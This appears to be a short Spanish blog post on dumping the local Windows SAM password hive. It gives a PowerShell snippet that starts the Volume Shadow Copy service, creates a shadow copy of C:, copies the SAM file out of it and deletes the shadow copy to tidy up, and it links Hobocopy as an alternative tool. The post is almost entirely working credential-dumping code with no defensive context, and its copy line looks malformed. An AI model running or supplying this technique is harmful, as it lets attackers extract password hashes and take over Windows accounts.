Volcado de SAM local en Windows:

Powershell:

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\`
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

Herramientas exe:

Hobocopy   https://candera.github.io/hobocopy/  (fuentes: https://github.com/candera/hobocopy )

 

Leave a Reply

Tu dirección de correo electrónico no será publicada.